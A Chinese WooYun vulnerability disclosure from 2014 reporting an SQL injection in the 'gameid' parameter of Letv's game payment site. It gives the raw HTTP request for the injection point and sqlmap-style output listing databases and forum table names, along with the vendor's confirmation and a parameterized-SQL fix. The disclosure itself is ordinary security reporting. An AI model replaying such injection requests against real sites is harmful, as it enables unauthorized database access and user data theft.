当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078556

漏洞标题:乐视某核心业务SQL注入漏洞

相关厂商:乐视网

漏洞作者: Eoh

提交时间:2014-10-07 17:10

修复时间:2014-11-21 17:12

公开时间:2014-11-21 17:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-07: 细节已通知厂商并且等待厂商处理中
2014-10-08: 厂商已经确认,细节仅向厂商公开
2014-10-18: 细节向核心白帽子及相关领域专家公开
2014-10-28: 细节向普通白帽子公开
2014-11-07: 细节向实习白帽子公开
2014-11-21: 细节向公众公开

简要描述:

未对用户输入正确执行危险字符清理

详细说明:

存在问题参数gameid
POST /index.php/pay/index/get_servers_select HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://pay.g.letv.com
Cookie: PHPSESSID=bgk9kuoas8ir9klifmnqbbkuf5
Host: pay.g.letv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
gameid=*

漏洞证明:

1.png


available databases [4]:                                                                                                                                                                                          
[*] game_bbs
[*] information_schema
[*] tg_admin
[*] web_admin


Database: game_bbs                                                                                                                                                                                                
[295 tables]
+-----------------------------------+
| pre_common_admincp_cmenu          |
| pre_common_admincp_group          |
| pre_common_admincp_member         |
| pre_common_admincp_perm           |
| pre_common_admincp_session        |
| pre_common_admingroup             |
| pre_common_adminnote              |
| pre_common_advertisement          |
| pre_common_advertisement_custom   |
| pre_common_banned                 |
| pre_common_block                  |
| pre_common_block_favorite         |
| pre_common_block_item             |
| pre_common_block_item_data        |
| pre_common_block_permission       |
| pre_common_block_pic              |
| pre_common_block_style            |
| pre_common_block_xml              |
| pre_common_cache                  |
| pre_common_card                   |
| pre_common_card_log               |
| pre_common_card_type              |
| pre_common_connect_guest          |
| pre_common_credit_log             |
| pre_common_credit_log_field       |
| pre_common_credit_rule            |
| pre_common_credit_rule_log        |
| pre_common_credit_rule_log_field  |
| pre_common_cron                   |
| pre_common_devicetoken            |
| pre_common_district               |
| pre_common_diy_data               |
| pre_common_domain                 |
| pre_common_failedip               |
| pre_common_failedlogin            |
| pre_common_friendlink             |
| pre_common_grouppm                |
| pre_common_invite                 |
| pre_common_magic                  |
| pre_common_magiclog               |
| pre_common_mailcron               |
| pre_common_mailqueue              |
| pre_common_member                 |
| pre_common_member_action_log      |
| pre_common_member_connect         |
| pre_common_member_count           |
| pre_common_member_crime           |
| pre_common_member_field_forum     |
| pre_common_member_field_home      |
| pre_common_member_forum_buylog    |
| pre_common_member_grouppm         |
| pre_common_member_log             |
| pre_common_member_magic           |
| pre_common_member_medal           |
| pre_common_member_newprompt       |
| pre_common_member_profile         |
| pre_common_member_profile_setting |
| pre_common_member_security        |
| pre_common_member_secwhite        |
| pre_common_member_stat_field      |
| pre_common_member_status          |
| pre_common_member_validate        |
| pre_common_member_verify          |
| pre_common_member_verify_info     |
| pre_common_member_wechat          |
| pre_common_member_wechatmp        |
| pre_common_myapp                  |
| pre_common_myinvite               |
| pre_common_mytask                 |
| pre_common_nav                    |
| pre_common_onlinetime             |
| pre_common_optimizer              |
| pre_common_patch                  |
| pre_common_plugin                 |
| pre_common_pluginvar              |
| pre_common_process                |
| pre_common_regip                  |
| pre_common_relatedlink            |
| pre_common_remote_port            |
| pre_common_report                 |
| pre_common_searchindex            |
| pre_common_seccheck               |
| pre_common_secquestion            |
| pre_common_session                |
| pre_common_setting                |
| pre_common_smiley                 |
| pre_common_sphinxcounter          |
| pre_common_stat                   |
| pre_common_statuser               |
| pre_common_style                  |
| pre_common_stylevar               |
| pre_common_syscache               |
| pre_common_tag                    |
| pre_common_tagitem                |
| pre_common_task                   |
| pre_common_taskvar                |
| pre_common_template               |
| pre_common_template_block         |
| pre_common_template_permission    |
| pre_common_uin_black              |
| pre_common_usergroup              |
| pre_common_usergroup_field        |
| pre_common_visit                  |
| pre_common_word                   |
| pre_common_word_type              |
| pre_connect_disktask              |
| pre_connect_feedlog               |
| pre_connect_memberbindlog         |
| pre_connect_postfeedlog           |
| pre_connect_tthreadlog            |
| pre_forum_access                  |
| pre_forum_activity                |
| pre_forum_activityapply           |
| pre_forum_announcement            |
| pre_forum_attachment              |
| pre_forum_attachment_0            |
| pre_forum_attachment_1            |
| pre_forum_attachment_2            |
| pre_forum_attachment_3            |
| pre_forum_attachment_4            |
| pre_forum_attachment_5            |
| pre_forum_attachment_6            |
| pre_forum_attachment_7            |
| pre_forum_attachment_8            |
| pre_forum_attachment_9            |
| pre_forum_attachment_exif         |
| pre_forum_attachment_unused       |
| pre_forum_attachtype              |
| pre_forum_bbcode                  |
| pre_forum_collection              |
| pre_forum_collectioncomment       |
| pre_forum_collectionfollow        |
| pre_forum_collectioninvite        |
| pre_forum_collectionrelated       |
| pre_forum_collectionteamworker    |
| pre_forum_collectionthread        |
| pre_forum_creditslog              |
| pre_forum_debate                  |
| pre_forum_debatepost              |
| pre_forum_faq                     |
| pre_forum_filter_post             |
| pre_forum_forum                   |
| pre_forum_forum_threadtable       |
| pre_forum_forumfield              |
| pre_forum_forumrecommend          |
| pre_forum_groupcreditslog         |
| pre_forum_groupfield              |
| pre_forum_groupinvite             |
| pre_forum_grouplevel              |
| pre_forum_groupuser               |
| pre_forum_hotreply_member         |
| pre_forum_hotreply_number         |
| pre_forum_imagetype               |
| pre_forum_medal                   |
| pre_forum_medallog                |
| pre_forum_memberrecommend         |
| pre_forum_moderator               |
| pre_forum_modwork                 |
| pre_forum_newthread               |
| pre_forum_onlinelist              |
| pre_forum_order                   |
| pre_forum_poll                    |
| pre_forum_polloption              |
| pre_forum_polloption_image        |
| pre_forum_pollvoter               |
| pre_forum_post                    |
| pre_forum_post_location           |
| pre_forum_post_moderate           |
| pre_forum_post_tableid            |
| pre_forum_postcache               |
| pre_forum_postcomment             |
| pre_forum_postlog                 |
| pre_forum_poststick               |
| pre_forum_promotion               |
| pre_forum_ratelog                 |
| pre_forum_relatedthread           |
| pre_forum_replycredit             |
| pre_forum_rsscache                |
| pre_forum_sofa                    |
| pre_forum_spacecache              |
| pre_forum_statlog                 |
| pre_forum_thread                  |
| pre_forum_thread_moderate         |
| pre_forum_threadaddviews          |
| pre_forum_threadcalendar          |
| pre_forum_threadclass             |
| pre_forum_threadclosed            |
| pre_forum_threaddisablepos        |
| pre_forum_threadhidelog           |
| pre_forum_threadhot               |
| pre_forum_threadimage             |
| pre_forum_threadlog               |
| pre_forum_threadmod               |
| pre_forum_threadpartake           |
| pre_forum_threadpreview           |
| pre_forum_threadprofile           |
| pre_forum_threadprofile_group     |
| pre_forum_threadrush              |
| pre_forum_threadtype              |
| pre_forum_trade                   |
| pre_forum_tradecomment            |
| pre_forum_tradelog                |
| pre_forum_typeoption              |
| pre_forum_typeoptionvar           |
| pre_forum_typevar                 |
| pre_forum_warning                 |
| pre_home_album                    |
| pre_home_album_category           |
| pre_home_appcreditlog             |
| pre_home_blacklist                |
| pre_home_blog                     |
| pre_home_blog_category            |
| pre_home_blog_moderate            |
| pre_home_blogfield                |
| pre_home_class                    |
| pre_home_click                    |
| pre_home_clickuser                |
| pre_home_comment                  |
| pre_home_comment_moderate         |
| pre_home_docomment                |
| pre_home_doing                    |
| pre_home_doing_moderate           |
| pre_home_favorite                 |
| pre_home_feed                     |
| pre_home_feed_app                 |
| pre_home_follow                   |
| pre_home_follow_feed              |
| pre_home_follow_feed_archiver     |
| pre_home_friend                   |
| pre_home_friend_request           |
| pre_home_friendlog                |
| pre_home_notification             |
| pre_home_pic                      |
| pre_home_pic_moderate             |
| pre_home_picfield                 |
| pre_home_poke                     |
| pre_home_pokearchive              |
| pre_home_share                    |
| pre_home_share_moderate           |
| pre_home_show                     |
| pre_home_specialuser              |
| pre_home_userapp                  |
| pre_home_userappfield             |
| pre_home_visitor                  |
| pre_mobile_setting                |
| pre_mobile_wechat_authcode        |
| pre_mobile_wsq_threadlist         |
| pre_portal_article_content        |
| pre_portal_article_count          |
| pre_portal_article_moderate       |
| pre_portal_article_related        |
| pre_portal_article_title          |
| pre_portal_article_trash          |
| pre_portal_attachment             |
| pre_portal_category               |
| pre_portal_category_permission    |
| pre_portal_comment                |
| pre_portal_comment_moderate       |
| pre_portal_rsscache               |
| pre_portal_topic                  |
| pre_portal_topic_pic              |
| pre_security_evilpost             |
| pre_security_eviluser             |
| pre_security_failedlog            |
| pre_ucenter_admins                |
| pre_ucenter_applications          |
| pre_ucenter_badwords              |
| pre_ucenter_domains               |
| pre_ucenter_failedlogins          |
| pre_ucenter_feeds                 |
| pre_ucenter_friends               |
| pre_ucenter_mailqueue             |
| pre_ucenter_memberfields          |
| pre_ucenter_members               |
| pre_ucenter_mergemembers          |
| pre_ucenter_newpm                 |
| pre_ucenter_notelist              |
| pre_ucenter_pm_indexes            |
| pre_ucenter_pm_lists              |
| pre_ucenter_pm_members            |
| pre_ucenter_pm_messages_0         |
| pre_ucenter_pm_messages_1         |
| pre_ucenter_pm_messages_2         |
| pre_ucenter_pm_messages_3         |
| pre_ucenter_pm_messages_4         |
| pre_ucenter_pm_messages_5         |
| pre_ucenter_pm_messages_6         |
| pre_ucenter_pm_messages_7         |
| pre_ucenter_pm_messages_8         |
| pre_ucenter_pm_messages_9         |
| pre_ucenter_protectedmembers      |
| pre_ucenter_settings              |
| pre_ucenter_sqlcache              |
| pre_ucenter_tags                  |
| pre_ucenter_vars                  |
+-----------------------------------+

修复方案:

参数化SQL语句

版权声明:转载请注明来源 Eoh@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-10-08 08:03

厂商回复:

谢谢挖掘~

最新状态:

暂无

漏洞评价:

评论

  1. 2014-10-28 20:19 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    pre是不是预生产系统?

  2. 2014-10-29 11:20 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    支付?我去